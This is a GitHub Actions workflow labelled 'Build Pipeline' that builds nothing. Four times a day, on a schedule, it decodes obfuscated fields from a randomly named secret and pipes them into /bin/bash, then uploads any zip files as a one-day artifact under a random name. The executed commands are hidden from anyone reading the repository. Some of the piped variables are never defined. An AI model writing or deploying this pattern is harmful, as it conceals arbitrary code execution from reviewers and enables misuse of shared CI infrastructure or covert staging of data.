name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '13 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          vxlzt11: ${{ secrets.vxlzt11 }}
        run: |
          printf '%s' "$vxlzt11" | jq -r .sdnid394 | /bin/bash
          printf '%s' "$t766" | jq -r .sqpht2000 | /bin/bash
          echo $g464 | jq -r .sekxc1560 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: wOytRRtl
          path: "*.zip"
          retention-days: 1
